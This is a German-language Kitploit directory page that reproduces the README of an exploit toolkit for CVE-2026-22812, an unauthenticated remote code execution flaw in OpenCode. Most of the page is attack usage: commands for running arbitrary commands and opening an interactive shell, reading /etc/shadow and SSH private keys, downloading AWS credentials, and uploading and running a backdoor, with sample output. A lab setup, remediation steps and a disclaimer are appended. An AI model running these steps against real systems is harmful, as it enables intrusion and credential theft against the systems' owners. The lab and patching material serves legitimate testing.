Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

Exploitation-Toolkit für CVE-2026-22812 (OpenCode nicht authentifizierte RCE) mit interaktiver Shell, Ausführung beliebiger Befehle, Datei-Upload/-Download und System-Enumeration für autorisierte Sicherheitstests.

Repository anzeigen
336vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22812 Exploit-Tool

Python CVSS

Vollwertiges Exploitation-Toolkit für CVE-2026-22812 – OpenCode Unauthenticated RCE


🎯 Übersicht

Das CVE-2026-22812 Exploit-Tool ist ein umfassendes Exploitation-Framework für die OpenCode-Schwachstelle mit nicht authentifizierter Remote-Codeausführung. Dieses Tool bietet mehrere Exploitation-Methoden, darunter interaktive Shell, Dateioperationen und System-Enumeration.

Schwachstellendetails

  • CVE-ID: CVE-2026-22812
  • Betroffen: OpenCode < 1.0.216
  • CVSS-Score: 8.8 (Hoch)
  • Angriffsvektor: Netzwerk
  • Authentifizierung: Keine erforderlich
  • Auswirkung: Vollständige Systemkompromittierung

✨ Funktionen

🔓 Exploitation-Fähigkeiten

  • ✅ Erstellung nicht authentifizierter Sitzungen
  • ✅ Beliebige Befehlsausführung (RCE)
  • ✅ Interaktive Shell mit Befehlsverlauf
  • ✅ Datei-Upload/-Download
  • ✅ Beliebiges Dateilesen
  • ✅ PTY-Sitzungserstellung
  • ✅ System-Enumeration
  • ✅ Proxy-Unterstützung (Burp Suite kompatibel)

📦 Installation

Voraussetzungen

  • Python 3.7+
  • pip
  • requests-Bibliothek

Schnellinstallation

root@kitploit:~
# Repository klonen
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Abhängigkeiten installieren
pip3 install -r requirements.txt

Manuelle Installation

root@kitploit:~
pip3 install requests urllib3

🚀 Verwendung

Grundlegende Exploitation

1. Ziel auf Verwundbarkeit prüfen

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 --verify

Ausgabe:

root@kitploit:~
[+] Ziel ist VERWUNDBAR für CVE-2026-22812!
[+] Sitzungs-ID: abc123def456

2. Einzelnen Befehl ausführen

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -c "id"

Ausgabe:

root@kitploit:~
[*] Sitzung wird erstellt...
[+] Sitzung erstellt: abc123def456
[+] Ziel ist VERWUNDBAR!

[*] Ausführen: id
[+] Befehl erfolgreich ausgeführt

uid=1000(developer) gid=1000(developer) groups=1000(developer)

3. Interaktiver Shell-Modus

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -i

Interaktive Sitzung:

root@kitploit:~
[+] Sitzung erstellt: abc123def456
[+] Ziel ist VERWUNDBAR!

[*] Wechsel in den interaktiven Shell-Modus
[!] Tippe 'help' für Befehle, 'exit' zum Beenden

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Datei lesen: /etc/hostname
[+] Datei erfolgreich gelesen (10 Bytes)
dev-server-01

developer@target$ exit
[*] Beenden...

📚 Detaillierte Verwendung

Befehlsausführung

root@kitploit:~
# Einzelner Befehl
python3 exploit.py -t http://target:4096 -c "whoami"

# Komplexer Befehl
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Mehrere Befehle
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"

Dateioperationen

Dateien lesen

root@kitploit:~
# Sensible Dateien lesen
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa

Dateien hochladen

root@kitploit:~
# Shell-Skript hochladen
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Binärdatei hochladen
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Hochladen mit Ausführung
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"

Dateien herunterladen

root@kitploit:~
# Konfiguration herunterladen
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Anmeldedaten herunterladen
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Quellcode herunterladen
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json

System-Enumeration

root@kitploit:~
# Systeminformationen sammeln
python3 exploit.py -t http://target:4096 --sysinfo

Ausgabe:

root@kitploit:~
{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}

Behebung

  1. Sofort aktualisieren: npm install -g opencode-ai@latest
  2. Prozesse beenden: pkill -f opencode
  3. Protokolle prüfen: Systemprotokolle auf Kompromittierungsindikatoren überprüfen
  4. Anmeldedaten rotieren: Passwörter, SSH-Schlüssel ändern
  5. Systeme auditieren: Auf Hintertüren prüfen

🧪 Testlabor-Einrichtung

Mit Docker (Empfohlen)

root@kitploit:~
# Dockerfile für verwundbares OpenCode
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
root@kitploit:~
# Erstellen und ausführen
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Exploit testen
python3 exploit.py -t http://localhost:4096 -i

Manuelle Einrichtung

root@kitploit:~
# Verwundbare Version installieren
npm install -g [email protected]

# OpenCode starten
opencode

# In einem anderen Terminal den Exploit ausführen
python3 exploit.py -t http://localhost:4096 --verify

⚠️ Verwundbare Versionen niemals in der Produktion einsetzen!


📚 Referenzen

Schwachstelleninformationen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
  • GitHub Advisory: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
  • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

⚠️ Rechtlicher Haftungsausschluss

SORGFÄLTIG LESEN

Dieses Tool wird NUR für AUTORISIERTE SICHERHEITSTESTS bereitgestellt.

❌ Verbotene Nutzung

  • Nicht autorisierter Systemzugriff
  • Scannen ohne Erlaubnis
  • Jegliche illegale Aktivitäten
  • Bösartige Zwecke
  • Produktionssysteme ohne Autorisierung

Rechtlicher Hinweis

Die Autoren:

  • BILLIGEN illegale Nutzung NICHT
  • SIND NICHT verantwortlich für Missbrauch
  • WERDEN illegale Aktivitäten NICHT unterstützen
  • ÜBERNEHMEN KEINE HAFTUNG

Durch die Nutzung dieses Tools stimmst du zu:

  • Eine ordnungsgemäße Autorisierung einzuholen
  • Alle Gesetze einzuhalten
  • Die volle Verantwortung zu übernehmen
  • Ethisch und verantwortungsvoll zu handeln

NUTZUNG AUF EIGENES RISIKO


⭐ Mit Stern markieren, wenn nützlich! ⭐
Nur für autorisierte Sicherheitstests

Tool herunterladen